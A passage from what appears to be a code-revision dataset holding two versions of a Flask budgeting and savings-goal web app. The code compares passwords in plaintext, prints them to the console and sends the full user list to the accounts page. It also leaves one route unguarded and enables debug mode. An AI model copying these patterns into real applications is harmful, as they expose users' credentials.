item in dai_im:\n db.add_rating(item, dai_im[item], user_id)\n stringg += \"'\" + item + \"'\" + ' : ' + \"'\" + str(dai_im[item]\n ) + \"'\" + ' '\n stringg += '},' + str(user_id) + '\\n'\n with open(file, 'r') as f:\n lines = f.readlines()\n with open(file, 'w') as f:\n for line in lines:\n if str(user_id) != line.strip('\\n').split(',')[1]:\n f.write(line)\n f.write(stringg)\n f.close()\n daily = request.form['all-inputs']\n print(f'This is daily: {monthly}')\n daily = json.loads(daily)\n monthly = json.loads(monthly)\n print(f'This is daily now {monthly}')\n w = dict([x for x in daily.values()])\n m = dict([x for x in monthly.values()])\n print(f'\\nThis is calculated m:{m}\\n')\n db.add_finances(bal, m, income, w, user_id)\n flash('Finances updated')\n return redirect(url_for('home'))\n\n\[email protected]('/goals')\ndef goals():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n g = db.search_goal_list(user_id)\n b = db.search_finance_list(user_id)\n t = db.search_time_list(user_id)\n date_now = datetime.date.today()\n price = g\n perc = g\n delta_months = 0\n if g != []:\n g = g[0][0]\n if price != []:\n price = price[0][1]\n if perc != []:\n perc = perc[0][2]\n\n def months_between(date1, date2):\n if date1 > date2:\n date1, date2 = date2, date1\n m1 = date1.year * 12 + date1.month\n m2 = date2.year * 12 + date2.month\n months = m2 - m1\n if date1.day > date2.day:\n months -= 1\n elif date1.day == date2.day:\n seconds1 = date1.hour * 3600 + date1.minute + date1.second\n seconds2 = date2.hour * 3600 + date2.minute + date2.second\n if seconds1 > seconds2:\n months -= 1\n return months\n if t != []:\n t = t[0][0]\n delta_months = months_between(datetime.datetime.strptime(t,\n '%Y-%m-%d'), datetime.datetime.strptime(str(date_now), '%Y-%m-%d'))\n print(delta_months)\n img = db.search_image_list(user_id)\n if img != []:\n img = 
img[0][0]\n if b != []:\n bal = b[0][0]\n inc = b[0][1]\n print(b)\n print(g)\n print(price)\n print(perc)\n print(img)\n if g or price:\n if b:\n print('Used the first one')\n perc_complete = delta_months * (perc / 100.0) * inc / price\n print(perc_complete)\n if perc_complete > 1:\n perc_complete = 1\n return render_template('goals.html', goal=g, goal_price=price,\n perc_inc=perc, image=img, bal=bal, income=inc, months=\n delta_months, perc_comp=perc_complete * 100)\n else:\n print('Used the second')\n return render_template('goals.html', goal=g, goal_price=price,\n perc_inc=perc, image=img)\n elif b:\n return render_template('goals.html', bal=bal, income=inc)\n else:\n return render_template('goals.html')\n\n\[email protected]('/gcalc', methods=['POST'])\ndef gcalc():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n goal_name = request.form['goal']\n goal_price = request.form['goal_price'][1:]\n percentage = request.form['slide']\n print('This is percentage:')\n print(percentage)\n print('gcalc')\n print(goal_name)\n print(goal_price)\n user_id = db.search_user_list(session['username'])[0][2]\n db.add_goals(goal_name, goal_price, percentage, user_id)\n a = db.search_image_list(user_id)\n print(a)\n if a == [] or a[0][2] != goal_name:\n try:\n l = urllib.request.urlopen(PIXABAY_STUB + goal_name.replace(' ',\n '+') + '&image_type=photo')\n p = json.loads(l.read())\n img = p['hits'][0]['webformatURL']\n except:\n return render_template('error.html', err=\n 'Cannot connect to API', fix=\n 'Try refreshing or contacting the site owner')\n else:\n img = a[0][1]\n db.add_images(img, goal_name, user_id)\n flash(f'Goal for {goal_name} at ${goal_price} has been added!')\n return redirect(url_for('home'))\n\n\[email protected]('/sankey')\ndef sankey():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = 
db.search_user_list(session['username'])[0][2]\n return render_template('sankey.html', idnum=user_id)\n\n\[email protected]('/pie')\ndef pie():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n return render_template('pie.html', idnum=user_id)\n\n\[email protected]('/area')\ndef area():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n goal = db.search_goal_list(user_id)\n if goal == []:\n return redirect(url_for('goals'))\n daily = db.search_expense_list(user_id)\n monthly = db.search_monthly_list(user_id)\n dadict = {}\n modict = {}\n print(goal)\n ratings = {}\n for names in daily:\n dadict[names[0]] = names[1]\n for names in monthly:\n modict[names[0]] = names[1]\n print(dadict, modict)\n percent = 0\n for names in db.search_rating_list(user_id):\n print(names)\n if names[0] in modict:\n percent = modict[names[0]] * 12 / goal[0][1]\n if names[0] in dadict:\n percent = dadict[names[0]] * 30 * 12 / goal[0][1]\n if names[1] <= 6 and percent >= 0.05:\n ratings[names[0]] = names[1], percent\n print(ratings)\n return render_template('area.html', idnum=user_id, ratings=ratings)\n\n\[email protected]('/logout')\ndef logout():\n if 'username' in session:\n session.pop('username')\n return redirect(url_for('home'))\n\n\[email protected]('/account')\ndef account():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_list = json.dumps(db.search_user_list(ret_all=True))\n print(json.dumps(db.search_user_list(ret_all=True)))\n return render_template('accounts.html', user_list=user_list)\n\n\[email protected]('/update', methods=['POST'])\ndef update():\n print('this is the updates')\n update_dict = request.form['all-options']\n update_dict = 
json.loads(update_dict)\n print(request.form)\n user_ids = db.search_user_list(session['username'])\n user = user_ids[0][-1]\n print(user)\n db.update_user_list(update_dict['username'] or user_ids[0][0], \n update_dict['password'] or user_ids[0][1], user)\n db.reset_statistics(user, update_dict['reset'])\n session.pop('username')\n session['username'] = update_dict['username'] or user_ids[0][0]\n flash('Account information updated successfully')\n return redirect(url_for('home'))\n\n\[email protected]('/del')\ndef delete():\n if 'username' not in session:\n flash(\"Woops. You can't be here\")\n return redirect(url_for('login'))\n user = db.search_user_list(session['username'])[0][-1]\n print(user)\n db.update_user_list(None, None, user, rem=True)\n flash('User successfully removed')\n session.pop('username')\n return redirect(url_for('home'))\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run()\n",
"step-4": "import os, datetime\nimport urllib\nfrom flask import Flask, flash, json, jsonify, redirect, render_template, request, session, url_for\nimport util.database as db\ntemplate_path = os.path.dirname(__file__) + '/templates'\nfile = ''\nif template_path != '/templates':\n app = Flask('__main__', template_folder=os.path.dirname(__file__) +\n '/templates', static_folder=os.path.dirname(__file__) + '/static')\n file = open(os.path.dirname(__file__) + '/data/keys.json')\nelse:\n app = Flask('__main__')\n file = open('./data/keys.json')\napp.secret_key = os.urandom(32)\ncontent = file.read()\nkeys = json.loads(content)\nPIXABAY_KEY = keys['Pixabay']\nPIXABAY_STUB = 'https://pixabay.com/api/?key=' + PIXABAY_KEY + '&q='\n\n\[email protected]('/')\ndef home():\n if 'username' in session:\n id_num = db.search_user_list(session['username'], is_usrname=True)[0][2\n ]\n finavail = db.search_finance_list(id_num)\n goalavail = db.search_goal_list(id_num)\n if finavail:\n session['finances'] = session['username']\n if goalavail:\n session['goals'] = session['username']\n set_goal = db.search_goal_list(id_num)\n print(set_goal)\n if set_goal != []:\n user_id = db.search_user_list(session['username'], is_usrname=True\n )[0][2]\n g = db.search_goal_list(user_id)\n b = db.search_finance_list(user_id)\n t = db.search_time_list(user_id)\n date_now = datetime.date.today()\n price = g\n perc = g\n delta_months = 0\n if g != []:\n g = g[0][0]\n if price != []:\n price = price[0][1]\n if perc != []:\n perc = perc[0][2]\n\n def months_between(date1, date2):\n if date1 > date2:\n date1, date2 = date2, date1\n m1 = date1.year * 12 + date1.month\n m2 = date2.year * 12 + date2.month\n months = m2 - m1\n if date1.day > date2.day:\n months -= 1\n elif date1.day == date2.day:\n seconds1 = date1.hour * 3600 + date1.minute + date1.second\n seconds2 = date2.hour * 3600 + date2.minute + date2.second\n if seconds1 > seconds2:\n months -= 1\n return months\n if t != []:\n t = t[0][0]\n 
delta_months = months_between(datetime.datetime.strptime(t,\n '%Y-%m-%d'), datetime.datetime.strptime(str(date_now),\n '%Y-%m-%d'))\n print(delta_months)\n img = db.search_image_list(user_id)\n if img != []:\n img = img[0][0]\n if b != []:\n bal = b[0][0]\n inc = b[0][1]\n print(b)\n print(g)\n print(price)\n print(perc)\n print(img)\n if g or price:\n if b:\n print('Used the first one')\n perc_complete = delta_months * (perc / 100.0) * inc / price\n print(perc_complete)\n if perc_complete > 1:\n perc_complete = 1\n return render_template('home.html', fin=finavail, goal=\n goalavail, set_goal=set_goal, goal_name=g,\n goal_price=price, perc_inc=perc, image=img, bal=bal,\n income=inc, months=delta_months, perc_comp=\n perc_complete * 100)\n return render_template('home.html', fin=finavail, goal=goalavail)\n return render_template('home.html', fin=finavail, goal=goalavail)\n return render_template('home.html')\n\n\[email protected]('/register')\ndef register():\n return render_template('register.html')\n\n\[email protected]('/login')\ndef login():\n return render_template('login.html')\n\n\[email protected]('/auth', methods=['POST'])\ndef auth():\n user = request.form.get('user')\n paswrd = request.form.get('pass')\n if request.form.get('submit') == 'Register':\n paswrd2 = request.form.get('pass2')\n print(paswrd)\n print(paswrd2)\n if paswrd != paswrd2:\n flash('Passwords Do Not Match')\n return redirect(url_for('register'))\n if db.register(user, paswrd):\n flash('Registered successfully')\n session['username'] = request.form['user']\n else:\n flash('Unable to register the user')\n return redirect(url_for('register'))\n print('Username has been registered previously!')\n else:\n match = db.search_user_list(user, is_usrname=True)\n if len(match) > 0:\n if match[0][1] == paswrd:\n session['username'] = request.form['user']\n else:\n flash('wrong Password')\n return redirect(url_for('login'))\n else:\n flash('User not found')\n return redirect(url_for('login'))\n 
return redirect(url_for('home'))\n\n\[email protected]('/finances')\ndef finance():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n items = db.search_finance_list(user_id)\n daily = db.search_expense_list(user_id, is_id=True)\n monthly = db.search_monthly_list(user_id, is_id=True)\n ratings = db.search_rating_list(user_id, is_id=True)\n print(ratings)\n print(f'Unlike month, this is daily: {daily}\\n')\n w = dict([(x[0], x[1]) for x in daily])\n s = dict([(x[0], x[1]) for x in monthly])\n r = dict([(x[0], x[1]) for x in ratings])\n print(f'THIS is monthly: {monthly}')\n print(f'THIS is s: {s}')\n print(f'These are the ratings: {r}')\n total = 0\n m_total = 0\n for x in w.values():\n total += float(x)\n for x in s.values():\n m_total += float(x)\n if items != []:\n bal, income, i = items[0]\n diction = {'Balance': bal, 'Income': income}\n return render_template('findata.html', diction=diction, daily=w,\n months=s, total=total, mtotal=m_total, completed=True, ratings=r)\n return render_template('findata.html')\n\n\[email protected]('/fincalc', methods=['POST'])\ndef calc():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n session['finances'] = session['username']\n bal = request.form['balance'][1:]\n monthly = request.form['monthly-inputs']\n income = request.form['income'][1:]\n s = request.form\n d_rates = request.form['daily-importance']\n m_rates = request.form['monthly-importance']\n print(d_rates)\n user_id = db.search_user_list(session['username'])[0][2]\n daily_dict = json.loads(d_rates)\n monthly_dict = json.loads(m_rates)\n print(daily_dict)\n print(monthly_dict)\n dai_im = dict([x for x in daily_dict.values()])\n mon_im = dict([x for x in monthly_dict.values()])\n file = os.path.dirname(__file__) + f'/static/ratings.csv'\n stringg = '{'\n try:\n with 
open(file) as f:\n print('File found, not creating...')\n f.close()\n except Exception as e:\n print(e)\n with open(file, 'a+') as f:\n print('File not found, creating...')\n f.write(f'ratings,id\\n')\n f.close()\n for item in mon_im:\n db.add_rating(item, mon_im[item], user_id)\n stringg += \"'\" + item + \"'\" + ' : ' + \"'\" + str(mon_im[item]\n ) + \"'\" + ' '\n for item in dai_im:\n db.add_rating(item, dai_im[item], user_id)\n stringg += \"'\" + item + \"'\" + ' : ' + \"'\" + str(dai_im[item]\n ) + \"'\" + ' '\n stringg += '},' + str(user_id) + '\\n'\n with open(file, 'r') as f:\n lines = f.readlines()\n with open(file, 'w') as f:\n for line in lines:\n if str(user_id) != line.strip('\\n').split(',')[1]:\n f.write(line)\n f.write(stringg)\n f.close()\n daily = request.form['all-inputs']\n print(f'This is daily: {monthly}')\n daily = json.loads(daily)\n monthly = json.loads(monthly)\n print(f'This is daily now {monthly}')\n w = dict([x for x in daily.values()])\n m = dict([x for x in monthly.values()])\n print(f'\\nThis is calculated m:{m}\\n')\n db.add_finances(bal, m, income, w, user_id)\n flash('Finances updated')\n return redirect(url_for('home'))\n\n\[email protected]('/goals')\ndef goals():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n g = db.search_goal_list(user_id)\n b = db.search_finance_list(user_id)\n t = db.search_time_list(user_id)\n date_now = datetime.date.today()\n price = g\n perc = g\n delta_months = 0\n if g != []:\n g = g[0][0]\n if price != []:\n price = price[0][1]\n if perc != []:\n perc = perc[0][2]\n\n def months_between(date1, date2):\n if date1 > date2:\n date1, date2 = date2, date1\n m1 = date1.year * 12 + date1.month\n m2 = date2.year * 12 + date2.month\n months = m2 - m1\n if date1.day > date2.day:\n months -= 1\n elif date1.day == date2.day:\n seconds1 = date1.hour * 3600 + date1.minute + 
date1.second\n seconds2 = date2.hour * 3600 + date2.minute + date2.second\n if seconds1 > seconds2:\n months -= 1\n return months\n if t != []:\n t = t[0][0]\n delta_months = months_between(datetime.datetime.strptime(t,\n '%Y-%m-%d'), datetime.datetime.strptime(str(date_now), '%Y-%m-%d'))\n print(delta_months)\n img = db.search_image_list(user_id)\n if img != []:\n img = img[0][0]\n if b != []:\n bal = b[0][0]\n inc = b[0][1]\n print(b)\n print(g)\n print(price)\n print(perc)\n print(img)\n if g or price:\n if b:\n print('Used the first one')\n perc_complete = delta_months * (perc / 100.0) * inc / price\n print(perc_complete)\n if perc_complete > 1:\n perc_complete = 1\n return render_template('goals.html', goal=g, goal_price=price,\n perc_inc=perc, image=img, bal=bal, income=inc, months=\n delta_months, perc_comp=perc_complete * 100)\n else:\n print('Used the second')\n return render_template('goals.html', goal=g, goal_price=price,\n perc_inc=perc, image=img)\n elif b:\n return render_template('goals.html', bal=bal, income=inc)\n else:\n return render_template('goals.html')\n\n\[email protected]('/gcalc', methods=['POST'])\ndef gcalc():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n goal_name = request.form['goal']\n goal_price = request.form['goal_price'][1:]\n percentage = request.form['slide']\n print('This is percentage:')\n print(percentage)\n print('gcalc')\n print(goal_name)\n print(goal_price)\n user_id = db.search_user_list(session['username'])[0][2]\n db.add_goals(goal_name, goal_price, percentage, user_id)\n a = db.search_image_list(user_id)\n print(a)\n if a == [] or a[0][2] != goal_name:\n try:\n l = urllib.request.urlopen(PIXABAY_STUB + goal_name.replace(' ',\n '+') + '&image_type=photo')\n p = json.loads(l.read())\n img = p['hits'][0]['webformatURL']\n except:\n return render_template('error.html', err=\n 'Cannot connect to API', fix=\n 'Try refreshing or contacting the site 
owner')\n else:\n img = a[0][1]\n db.add_images(img, goal_name, user_id)\n flash(f'Goal for {goal_name} at ${goal_price} has been added!')\n return redirect(url_for('home'))\n\n\[email protected]('/sankey')\ndef sankey():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n return render_template('sankey.html', idnum=user_id)\n\n\[email protected]('/pie')\ndef pie():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n return render_template('pie.html', idnum=user_id)\n\n\[email protected]('/area')\ndef area():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n goal = db.search_goal_list(user_id)\n if goal == []:\n return redirect(url_for('goals'))\n daily = db.search_expense_list(user_id)\n monthly = db.search_monthly_list(user_id)\n dadict = {}\n modict = {}\n print(goal)\n ratings = {}\n for names in daily:\n dadict[names[0]] = names[1]\n for names in monthly:\n modict[names[0]] = names[1]\n print(dadict, modict)\n percent = 0\n for names in db.search_rating_list(user_id):\n print(names)\n if names[0] in modict:\n percent = modict[names[0]] * 12 / goal[0][1]\n if names[0] in dadict:\n percent = dadict[names[0]] * 30 * 12 / goal[0][1]\n if names[1] <= 6 and percent >= 0.05:\n ratings[names[0]] = names[1], percent\n print(ratings)\n return render_template('area.html', idnum=user_id, ratings=ratings)\n\n\[email protected]('/logout')\ndef logout():\n if 'username' in session:\n session.pop('username')\n return redirect(url_for('home'))\n\n\[email protected]('/account')\ndef account():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return 
redirect(url_for('login'))\n user_list = json.dumps(db.search_user_list(ret_all=True))\n print(json.dumps(db.search_user_list(ret_all=True)))\n return render_template('accounts.html', user_list=user_list)\n\n\[email protected]('/update', methods=['POST'])\ndef update():\n print('this is the updates')\n update_dict = request.form['all-options']\n update_dict = json.loads(update_dict)\n print(request.form)\n user_ids = db.search_user_list(session['username'])\n user = user_ids[0][-1]\n print(user)\n db.update_user_list(update_dict['username'] or user_ids[0][0], \n update_dict['password'] or user_ids[0][1], user)\n db.reset_statistics(user, update_dict['reset'])\n session.pop('username')\n session['username'] = update_dict['username'] or user_ids[0][0]\n flash('Account information updated successfully')\n return redirect(url_for('home'))\n\n\[email protected]('/del')\ndef delete():\n if 'username' not in session:\n flash(\"Woops. You can't be here\")\n return redirect(url_for('login'))\n user = db.search_user_list(session['username'])[0][-1]\n print(user)\n db.update_user_list(None, None, user, rem=True)\n flash('User successfully removed')\n session.pop('username')\n return redirect(url_for('home'))\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run()\n",
"step-5": "import os, datetime\r\nimport urllib\r\n\r\nfrom flask import (Flask, flash, json, jsonify, redirect, render_template,\r\n request, session, url_for)\r\n\r\nimport util.database as db\r\n\r\ntemplate_path=os.path.dirname(__file__)+\"/templates\"\r\nfile=\"\"\r\nif template_path!=\"/templates\":\r\n app = Flask(\"__main__\",template_folder=os.path.dirname(__file__)+\"/templates\",static_folder=os.path.dirname(__file__)+\"/static\")\r\n file = open(os.path.dirname(__file__)+'/data/keys.json')\r\nelse:\r\n app = Flask(\"__main__\")\r\n file = open('./data/keys.json')\r\n\r\napp.secret_key = os.urandom(32)\r\n\r\n\r\ncontent = file.read()\r\nkeys = json.loads(content)\r\n\r\n# has a 5000 calls/day limit\r\nPIXABAY_KEY = keys['Pixabay']\r\nPIXABAY_STUB = \"https://pixabay.com/api/?key=\" + PIXABAY_KEY + \"&q=\" #separate words with \"+\"\r\[email protected]('/')\r\ndef home():\r\n if \"username\" in session:\r\n id_num=db.search_user_list(session[\"username\"], is_usrname=True)[0][2]\r\n finavail=db.search_finance_list(id_num)\r\n goalavail=db.search_goal_list(id_num)\r\n if finavail:\r\n session[\"finances\"]=session[\"username\"]\r\n if goalavail:\r\n session[\"goals\"]=session[\"username\"]\r\n set_goal = db.search_goal_list(id_num)\r\n print(set_goal)\r\n if set_goal != []:\r\n user_id = db.search_user_list(session['username'], is_usrname=True)[0][2]\r\n g = db.search_goal_list(user_id)\r\n b = db.search_finance_list(user_id)\r\n t = db.search_time_list(user_id)\r\n date_now = datetime.date.today()\r\n price = g\r\n perc = g\r\n delta_months = 0\r\n if g != []:\r\n g = g[0][0]\r\n if price != []:\r\n price = price[0][1]\r\n if perc != []:\r\n perc = perc[0][2]\r\n ##function to get difference in months between 2 dates\r\n def months_between(date1,date2):\r\n if date1>date2:\r\n date1,date2=date2,date1\r\n m1=date1.year*12+date1.month\r\n m2=date2.year*12+date2.month\r\n months=m2-m1\r\n if date1.day>date2.day:\r\n months-=1\r\n elif 
date1.day==date2.day:\r\n seconds1=date1.hour*3600+date1.minute+date1.second\r\n seconds2=date2.hour*3600+date2.minute+date2.second\r\n if seconds1>seconds2:\r\n months-=1\r\n return months\r\n\r\n if t != []:\r\n t = t[0][0]\r\n delta_months = months_between(datetime.datetime.strptime(t,'%Y-%m-%d'), datetime.datetime.strptime(str(date_now),'%Y-%m-%d'))\r\n print(delta_months)\r\n\r\n img = db.search_image_list(user_id)\r\n if img != []:\r\n img = img[0][0]\r\n if b != []:\r\n bal = b[0][0]\r\n inc = b[0][1]\r\n print(b)\r\n print(g)\r\n print(price)\r\n print(perc)\r\n print(img)\r\n if g or price:\r\n if b:\r\n print(\"Used the first one\")\r\n perc_complete = (delta_months * (perc / 100.0) * inc)/price\r\n print(perc_complete)\r\n if perc_complete > 1:\r\n perc_complete = 1\r\n return render_template('home.html',fin=finavail,goal=goalavail, set_goal= set_goal, goal_name =g, goal_price=price,perc_inc = perc, image=img, bal=bal, income=inc, months= delta_months, perc_comp = perc_complete * 100 )\r\n return render_template('home.html',fin=finavail,goal=goalavail)\r\n return render_template('home.html',fin=finavail,goal=goalavail)\r\n return render_template('home.html')\r\n\r\[email protected]('/register')\r\ndef register():\r\n return render_template('register.html')\r\[email protected]('/login')\r\ndef login():\r\n return render_template('login.html')\r\[email protected]('/auth', methods=['POST'])\r\ndef auth():\r\n user = request.form.get(\"user\")\r\n paswrd = request.form.get('pass')\r\n if request.form.get(\"submit\")==\"Register\":\r\n paswrd2 = request.form.get(\"pass2\")\r\n print(paswrd)\r\n print(paswrd2)\r\n if paswrd != paswrd2:\r\n flash(\"Passwords Do Not Match\")\r\n return redirect(url_for('register'))\r\n if db.register(user, paswrd):\r\n flash(\"Registered successfully\")\r\n session['username'] = request.form['user']\r\n else:\r\n flash(\"Unable to register the user\")\r\n return redirect(url_for('register'))\r\n print(\"Username has been 
registered previously!\")\r\n else:\r\n match=db.search_user_list(user, is_usrname=True)\r\n if len(match)>0:\r\n if match[0][1]==paswrd:\r\n session[\"username\"]=request.form[\"user\"]\r\n else:\r\n flash(\"wrong Password\")\r\n return redirect(url_for('login'))\r\n else:\r\n flash(\"User not found\")\r\n return redirect(url_for('login'))\r\n return redirect(url_for('home'))\r\n\r\[email protected]('/finances')\r\ndef finance():\r\n if 'username' not in session:\r\n flash(\"You must be logged in to access this page\")\r\n return redirect(url_for('login'))\r\n user_id = db.search_user_list(session['username'])[0][2]\r\n items = db.search_finance_list(user_id)\r\n daily = db.search_expense_list(user_id, is_id=True)\r\n monthly = db.search_monthly_list(user_id, is_id=True)\r\n ratings = db.search_rating_list(user_id, is_id=True)\r\n print(ratings)\r\n print(f\"Unlike month, this is daily: {daily}\\n\")\r\n w = dict([ (x[0], x[1]) for x in daily ])\r\n s = dict([ (x[0], x[1]) for x in monthly ])\r\n r = dict([ (x[0], x[1]) for x in ratings ])\r\n print(f\"THIS is monthly: {monthly}\")\r\n print(f\"THIS is s: {s}\")\r\n print(f\"These are the ratings: {r}\")\r\n total = 0\r\n m_total = 0\r\n for x in w.values():\r\n total += float(x)\r\n for x in s.values():\r\n m_total += float(x)\r\n if items != []:\r\n bal,income,i = items[0]\r\n diction = {\"Balance\":bal, \"Income\":income}\r\n return render_template('findata.html',\r\n diction=diction,\r\n daily=w,\r\n months = s,\r\n total=total,\r\n mtotal = m_total,completed=True, ratings=r)\r\n return render_template('findata.html')\r\n\r\[email protected]('/fincalc', methods=['POST'])\r\ndef calc():\r\n if 'username' not in session:\r\n flash(\"You must be logged in to access this page\")\r\n return redirect(url_for('login'))\r\n # print(request.form)\r\n session[\"finances\"]=session[\"username\"]\r\n bal = request.form['balance'][1:]\r\n monthly = request.form['monthly-inputs']\r\n income = request.form['income'][1:]\r\n 
# print(request.form)\r\n s = request.form\r\n d_rates = request.form['daily-importance']\r\n m_rates = request.form['monthly-importance']\r\n print(d_rates)\r\n user_id = db.search_user_list(session['username'])[0][2]\r\n daily_dict = json.loads(d_rates)\r\n monthly_dict = json.loads(m_rates)\r\n print(daily_dict)\r\n print(monthly_dict)\r\n\r\n dai_im = dict([x for x in daily_dict.values()]) # {expenseName: rating, expenseName2: rating, ...}\r\n mon_im = dict([x for x in monthly_dict.values()])\r\n file=os.path.dirname(__file__)+f'/static/ratings.csv'\r\n stringg = \"{\"\r\n try:\r\n with open(file) as f: # if readable, file already exists\r\n print(\"File found, not creating...\")\r\n f.close()\r\n except Exception as e:\r\n print(e)\r\n with open(file, 'a+') as f: # creates the file\r\n print(\"File not found, creating...\")\r\n f.write(f\"ratings,id\\n\")\r\n f.close()\r\n for item in mon_im:\r\n db.add_rating(item, mon_im[item], user_id)\r\n stringg += \"'\" + item + \"'\" + \" : \" + \"'\" + str(mon_im[item]) + \"'\" + \" \"\r\n\r\n for item in dai_im:\r\n db.add_rating(item, dai_im[item], user_id)\r\n stringg += \"'\" + item + \"'\" + \" : \" + \"'\" + str(dai_im[item]) + \"'\" + \" \"\r\n stringg += \"},\" + str(user_id) + \"\\n\"\r\n\r\n with open(file, \"r\") as f:\r\n lines = f.readlines()\r\n with open(file, \"w\") as f:\r\n for line in lines:\r\n if str(user_id) != line.strip(\"\\n\").split(\",\")[1]:\r\n f.write(line)\r\n f.write(stringg)\r\n f.close()\r\n daily = request.form['all-inputs']\r\n print(f\"This is daily: {monthly}\")\r\n daily = json.loads(daily) # dictionary\r\n monthly = json.loads(monthly)\r\n print(f\"This is daily now {monthly}\")\r\n w = dict([x for x in daily.values()]) # {expense1: $$$, expense2: $$$, ...}\r\n m = dict([x for x in monthly.values()])\r\n print(f\"\\nThis is calculated m:{m}\\n\")\r\n db.add_finances(bal, m, income, w, user_id)\r\n flash(\"Finances updated\")\r\n return redirect(url_for('home'))\r\n\r\[email 
protected]('/goals')\r\ndef goals():\r\n if 'username' not in session:\r\n flash(\"You must be logged in to access this page\")\r\n return redirect(url_for('login'))\r\n user_id = db.search_user_list(session['username'])[0][2]\r\n g = db.search_goal_list(user_id)\r\n b = db.search_finance_list(user_id)\r\n t = db.search_time_list(user_id)\r\n date_now = datetime.date.today()\r\n price = g\r\n perc = g\r\n delta_months = 0\r\n if g != []:\r\n g = g[0][0]\r\n if price != []:\r\n price = price[0][1]\r\n if perc != []:\r\n perc = perc[0][2]\r\n ##function to get difference in months between 2 dates\r\n def months_between(date1,date2):\r\n if date1>date2:\r\n date1,date2=date2,date1\r\n m1=date1.year*12+date1.month\r\n m2=date2.year*12+date2.month\r\n months=m2-m1\r\n if date1.day>date2.day:\r\n months-=1\r\n elif date1.day==date2.day:\r\n seconds1=date1.hour*3600+date1.minute+date1.second\r\n seconds2=date2.hour*3600+date2.minute+date2.second\r\n if seconds1>seconds2:\r\n months-=1\r\n return months\r\n\r\n if t != []:\r\n t = t[0][0]\r\n delta_months = months_between(datetime.datetime.strptime(t,'%Y-%m-%d'), datetime.datetime.strptime(str(date_now),'%Y-%m-%d'))\r\n print(delta_months)\r\n\r\n img = db.search_image_list(user_id)\r\n if img != []:\r\n img = img[0][0]\r\n if b != []:\r\n bal = b[0][0]\r\n inc = b[0][1]\r\n print(b)\r\n print(g)\r\n print(price)\r\n print(perc)\r\n print(img)\r\n if g or price:\r\n if b:\r\n print(\"Used the first one\")\r\n perc_complete = (delta_months * (perc / 100.0) * inc)/price\r\n print(perc_complete)\r\n if perc_complete > 1:\r\n perc_complete = 1\r\n return render_template('goals.html', goal=g, goal_price=price,perc_inc = perc, image=img, bal=bal, income=inc, months= delta_months, perc_comp = perc_complete * 100 )\r\n else:\r\n print(\"Used the second\")\r\n return render_template('goals.html', goal=g, goal_price=price,perc_inc = perc, image=img)\r\n else:\r\n if b:\r\n return render_template('goals.html', bal=bal, 
income=inc)\r\n else:\r\n return render_template('goals.html')\r\n\r\[email protected]('/gcalc', methods=['POST'])\r\ndef gcalc():\r\n if 'username' not in session:\r\n flash(\"You must be logged in to access this page\")\r\n return redirect(url_for('login'))\r\n goal_name = request.form['goal']\r\n goal_price = request.form['goal_price'][1:]\r\n percentage = request.form['slide']\r\n print(\"This is percentage:\")\r\n print(percentage)\r\n print(\"gcalc\")\r\n print(goal_name)\r\n print(goal_price)\r\n user_id = db.search_user_list(session['username'])[0][2]\r\n db.add_goals(goal_name, goal_price, percentage, user_id)\r\n a = db.search_image_list(user_id)\r\n print(a)\r\n # optimization to save on api calls\r\n if a == [] or a[0][2] != goal_name:\r\n try:\r\n l = urllib.request.urlopen(PIXABAY_STUB + goal_name.replace(' ', '+') + \"&image_type=photo\")\r\n p = json.loads(l.read())\r\n img = p['hits'][0]['webformatURL']\r\n except:\r\n return render_template('error.html', err=\"Cannot connect to API\", fix=\"Try refreshing or contacting the site owner\")\r\n else:\r\n img = a[0][1]\r\n db.add_images(img, goal_name, user_id)\r\n flash(f\"Goal for {goal_name} at ${goal_price} has been added!\")\r\n return redirect(url_for('home'))\r\n\r\[email protected]('/sankey')\r\ndef sankey():\r\n if 'username' not in session:\r\n flash(\"You must be logged in to access this page\")\r\n return redirect(url_for('login'))\r\n user_id = db.search_user_list(session['username'])[0][2]\r\n return render_template('sankey.html',idnum=user_id)\r\[email protected]('/pie')\r\ndef pie():\r\n if 'username' not in session:\r\n flash(\"You must be logged in to access this page\")\r\n return redirect(url_for('login'))\r\n user_id = db.search_user_list(session['username'])[0][2]\r\n return render_template('pie.html',idnum=user_id)\r\[email protected]('/area')\r\ndef area():\r\n if 'username' not in session:\r\n flash(\"You must be logged in to access this page\")\r\n return 
